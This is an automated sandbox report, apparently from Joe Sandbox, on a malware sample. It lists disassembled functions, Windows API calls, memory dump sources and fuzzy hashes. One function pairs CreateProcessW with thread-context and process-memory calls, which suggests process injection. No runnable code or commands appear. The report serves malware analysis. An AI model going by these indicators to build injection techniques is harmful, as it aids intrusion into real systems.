Part of subcall function 00E487DB: RaiseException.KERNEL32(?,?,?,00EDBAF8,00000000,?,?,?,?,00E41046,?,00EDBAF8,?,00000001), ref: 00E48830

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 719a28a87d6350b440807edf5993349b90842419b17d41040a96f69b90243abf
Instruction ID: 1be6fdc05bcdfdbf93209a4b0c1d9b5344cb685745d98d3d9e8c45a877d8b389
Opcode Fuzzy Hash: 719a28a87d6350b440807edf5993349b90842419b17d41040a96f69b90243abf
Instruction Fuzzy Hash: 0FF0C83550035DA7CB20BB58FD169DF7BEC9F01354F10246AF904B6692EFB19AC092D4

Function 00E4582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E4585C
__lock_file.LIBCMT ref: 00E4587D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 4eb4c5d0489ec410f43572a0151dae0702befb43211819f5acd488584b0b50be
Instruction ID: b096aab8ba6bf9ddf6e6d007372b4094bfffa4cc60ae7dc7c32301de48967302
Opcode Fuzzy Hash: 4eb4c5d0489ec410f43572a0151dae0702befb43211819f5acd488584b0b50be
Instruction Fuzzy Hash: 8A01AC72C00608EBCF21AF65AD0259F7BE1AF85360F145225F8147B162DF318A11DB51

Function 00E455D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E48D68: __getptd_noexit.LIBCMT ref: 00E48D68

__lock_file.LIBCMT ref: 00E4561B

Part of subcall function 00E46E4E: __lock.LIBCMT ref: 00E46E71

__fclose_nolock.LIBCMT ref: 00E45626

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: dbabc9f3eddf8210767b9f79750f2846f58d21bac4d15153cf6b6840eb559b84
Instruction ID: 4ae5201f275e04781689e5085ae1f84ffa706fb1b6f48752078de0ec04a2469d
Opcode Fuzzy Hash: dbabc9f3eddf8210767b9f79750f2846f58d21bac4d15153cf6b6840eb559b84
Instruction Fuzzy Hash: 78F0B472901B04DBDB20BF75A90276E77E16F41734F56A24AA414BB1C3CF7C8A019B55

Function 019112FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01911ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01911B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01911B73

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 46dbff9a572463bdb2bf465902d8ec14e4c8b7b6e17391ed7a782b194787a00e
Instruction ID: 76026c7473fa3be415c35220b4cf06de56c0f0b3e61b985e3c052f8e5deee515
Opcode Fuzzy Hash: 46dbff9a572463bdb2bf465902d8ec14e4c8b7b6e17391ed7a782b194787a00e
Instruction Fuzzy Hash: D312DD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A4FC1CB5A

Function 00E32123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef363d1cb81830ffd863792ca9c01d71ed610a2c296c15a66eb1d4c182e06c6
Instruction ID: cbfe71780bf8f53b6381d616d9dd242b9448e851f60ab181121208e102e2483f
Opcode Fuzzy Hash: aef363d1cb81830ffd863792ca9c01d71ed610a2c296c15a66eb1d4c182e06c6
Instruction Fuzzy Hash: 03518035700614AFCF14EB64DA96EAE77E5AF85314F14A168F94ABB292CA30ED00CB51

Function 00E25C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E25CF6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f28eba33d7685acfc8aada2cbf016d88fafe5da7c587c1c1d4af2699b617a192
Instruction ID: 9693d88ac2e41310a7bb57436d8eee81aeff524badb4ffcc95079108fc8fe8ae
Opcode Fuzzy Hash: f28eba33d7685acfc8aada2cbf016d88fafe5da7c587c1c1d4af2699b617a192
Instruction Fuzzy Hash: C3315C72A00B29AFCB18CF29D98569DF7B5FF48314F148629D819A3710E731B950DB90

Function 00E600D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E600E1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 55e43b483079577102ee66a9315562353a3b5bd3acdfa3ab7067971d8b062852
Instruction ID: e89837fa8f17409df4685d82b86ded43b404b7f4dfd7a77fd6348f490f414cb2
Opcode Fuzzy Hash: 55e43b483079577102ee66a9315562353a3b5bd3acdfa3ab7067971d8b062852
Instruction Fuzzy Hash: 30411B74504351CFDB24DF14D484B1ABBE0BF45358F1998ACE899AB362C371EC85CB52

Function 00E25B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E25B61

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2b31a1c500e823fdd1a45de34fdb916bf78db11e1c2f7dceebccbd0c73ad7056
Instruction ID: 265fdb644c91c3df74ae229cef0f0dfbd1683f29ebc02abcd25d1c89e9d9ebcf
Opcode Fuzzy Hash: 2b31a1c500e823fdd1a45de34fdb916bf78db11e1c2f7dceebccbd0c73ad7056
Instruction Fuzzy Hash: 92210271A00A18EBDF185F12F98167A7FF8FF00381F21986AE885F5150EB7186E88B41

Function 00E24F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E24D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E24D4D

Part of subcall function 00E4548B: __wfsopen.LIBCMT ref: 00E45496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00EE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E24F6F

Part of subcall function 00E24CC8: FreeLibrary.KERNEL32(00000000), ref: 00E24D02

Part of subcall function 00E24DD0: _memmove.LIBCMT ref: 00E24E1A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 62e04b76f3145bedb91905bd4fd915eee5ec4f306e0727d8b4a8bb7189cd26db
Instruction ID: 87a97143a1b50eaa09aad17a0248a0aa6db905b949f3fdd71bdbe07f09860f16
Opcode Fuzzy Hash: 62e04b76f3145bedb91905bd4fd915eee5ec4f306e0727d8b4a8bb7189cd26db
Instruction Fuzzy Hash: CE110D72700325ABDF10FF74ED02FAD77E49F84701F149829F541BA1C1DA715A059760

Function 00E601AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00E601BB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: cc1fcf4b7348f587703342c7d9a67f8cec97bb01c308437f8cd2b53b2f76c9f7
Instruction ID: 85eba7c09d75bc890e0edd2241963bc560b2fc05c148c70fa913a6218455981d
Opcode Fuzzy Hash: cc1fcf4b7348f587703342c7d9a67f8cec97bb01c308437f8cd2b53b2f76c9f7
Instruction Fuzzy Hash: 982113B4508361CFCB24DF54D444A5ABBE0BF88358F09996CE88A67722D731F885CB52

Function 00E25D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E25807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E25D76

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3b3275885a5e0c21c94ad26747cdab773ecd6ebe4a909de558858eab5c6aa154
Instruction ID: b513c151c0a1dbe136f9f04a6cdfdc5611ecd0f8da15c34aa4fd953ae7430887
Opcode Fuzzy Hash: 3b3275885a5e0c21c94ad26747cdab773ecd6ebe4a909de558858eab5c6aa154
Instruction Fuzzy Hash: C1112836200B119FD3208F15E984B63B7E5EB45754F10892EE4AA96A50D770E945CF60

Function 00E25BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E5E141

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f81bb0d9c40211a16c2ddc2fba480c37069f24b1f4b1b952f0fc00164d3fb58f
Instruction ID: 90b71f0785ff97b9279ceeff1b38e9707e5561976b43510905fa3cae1f13ec0f
Opcode Fuzzy Hash: f81bb0d9c40211a16c2ddc2fba480c37069f24b1f4b1b952f0fc00164d3fb58f
Instruction Fuzzy Hash: 0D018FB9600942AFC305DB29D942D26FBE9FF8A3543149169F819D7702DB30EC21CBE0

Function 00E44A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00E44AD6

Part of subcall function 00E48D68: __getptd_noexit.LIBCMT ref: 00E48D68

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 7689c2457c91fc1ae43867bcfb43c12ea136db9156d5ada3a895db67730d6885
Instruction ID: d419c24430484cbe6e5b7a1163454535be5f954a1855e48d88ad80013f919845
Opcode Fuzzy Hash: 7689c2457c91fc1ae43867bcfb43c12ea136db9156d5ada3a895db67730d6885
Instruction Fuzzy Hash: 7FF0FFB1A00209ABDF61BF64AC0279E36E1AF00329F04A114B424BA1D1EB788A10EF41

Function 00E24FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00EE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E24FDE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 706fd122b5395372fbf6fa3c7ee6489e656b00a77fb5bfd0e4e46806e9d3ddab
Instruction ID: 182c163b02552c508d654d393fc1ece66a60211295d5ad9e59dc65b3ad8bfe5f
Opcode Fuzzy Hash: 706fd122b5395372fbf6fa3c7ee6489e656b00a77fb5bfd0e4e46806e9d3ddab
Instruction Fuzzy Hash: 66F039B1205722CFDB349F64F994862BBE1BF55329320AA3EE1D7A2A51C731A844DF40

Function 00E409D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E409F4

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: eacc632eefdec118d2faf1a3f287672eb1767f4914236da28227304aea5f3594
Instruction ID: 1ed3dda348a13ceb295f450df6b7b8a8d2c0983e95424b10a6603a00091de5cc
Opcode Fuzzy Hash: eacc632eefdec118d2faf1a3f287672eb1767f4914236da28227304aea5f3594
Instruction Fuzzy Hash: F6E0CD369052285BC720D6989C05FFA77EDDFCD791F0501F5FC4CE7215D960AC858690

Function 00E89129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00E8914B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: a3cddc38769a52e6a10fea428270c0fdbbb38a5d851e8ee94bee76f53a8b01fc
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 9AE092B1518B405FD7389A24D8147E373E0AB06319F04081CF29E93342EF6378418759

Function 00E25DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00E5E16B,?,?,00000000), ref: 00E25DBF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 47e83827cec1baecb3a32f05b40b6e875552bad78eaa371da22cad3a7bf2c73b
Instruction ID: 9ee29c2512d470e27da5034860ae9a3c8c530bcf87a282994878097e2193f40d
Opcode Fuzzy Hash: 47e83827cec1baecb3a32f05b40b6e875552bad78eaa371da22cad3a7bf2c73b
Instruction Fuzzy Hash: FAD0C77464020CBFE710DB81DC46FA9777CDB05710F100294FD0466290D6B27D548795

Function 00E4548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00E45496

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: eeee168e01b338d4889094c4d39f866aebcc470ebc4ed5b11097f8ec6775dd9a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: FEB0927684020C77DE012E82FC02A593B599B40678F808020FB1C2C562A673AAA09689

Function 00E8D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00E8D46A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 99288ec727041f8681f104d983aae2ab83337c33fa8bf6641f4b25feb426868a
Instruction ID: cc3840609e33d8de6d21647121929f9c06f48d823b840f9245632a30f50eab7b
Opcode Fuzzy Hash: 99288ec727041f8681f104d983aae2ab83337c33fa8bf6641f4b25feb426868a
Instruction Fuzzy Hash: 477186712083118FCB14EF24D991A6EB7E1BF88314F04656DF49EA7292DB30ED49CB52

Function 00E40E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00E40EF7

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 0b459b0ea0bece7547ad93d1513491498f49627ebcb99e6ad6153f1d81fc02e1
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 65312571A00105EFCB18DF48E480969F7A2FF99304B24AAB5E60AEB651D731EDD1CBC0

Function 019129BB Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01912A77

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

